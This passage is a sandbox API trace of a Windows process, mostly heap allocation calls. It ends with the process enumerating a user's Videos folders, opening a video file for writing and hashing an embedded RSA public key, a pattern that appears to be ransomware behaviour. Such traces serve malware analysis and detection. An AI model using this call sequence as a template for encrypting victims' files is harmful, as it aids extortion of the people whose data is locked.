Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\") returned="hWmlgmybmvGq Gv\\" [0060.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\") returned="XeSTpd\\" [0060.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0060.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0060.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.997] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.997] PathFindFileNameW (pszPath="") returned="" [0060.997] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf63fb160, ftCreationTime.dwHighDateTime=0x1d4cfd5, ftLastAccessTime.dwLowDateTime=0x5f75c20, ftLastAccessTime.dwHighDateTime=0x1d4cb7b, ftLastWriteTime.dwLowDateTime=0x5f75c20, ftLastWriteTime.dwHighDateTime=0x1d4cb7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.997] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf63fb160, ftCreationTime.dwHighDateTime=0x1d4cfd5, ftLastAccessTime.dwLowDateTime=0x5f75c20, ftLastAccessTime.dwHighDateTime=0x1d4cb7b, ftLastWriteTime.dwLowDateTime=0x5f75c20, ftLastWriteTime.dwHighDateTime=0x1d4cb7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.997] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe72be990, ftCreationTime.dwHighDateTime=0x1d4d184, ftLastAccessTime.dwLowDateTime=0x59b2d8f0, ftLastAccessTime.dwHighDateTime=0x1d4cbfb, ftLastWriteTime.dwLowDateTime=0x59b2d8f0, ftLastWriteTime.dwHighDateTime=0x1d4cbfb, nFileSizeHigh=0x0, nFileSizeLow=0x13d16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EjJOrnaIC80zrDKVf.mkv", cAlternateFileName="EJJORN~1.MKV")) returned 1 [0060.997] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\EjJOrnaIC80zrDKVf.mkv") returned=".mkv" [0060.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\EjJOrnaIC80zrDKVf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\ejjornaic80zrdkvf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.997] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=81174) returned 1 [0060.997] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.000] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13cf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.000] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.000] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x13d16, lpOverlapped=0x0) returned 1 [0061.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.001] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.002] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.002] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.002] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.002] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.002] GetLastError () returned 0x0 [0061.002] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.002] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.002] HeapFree (in: 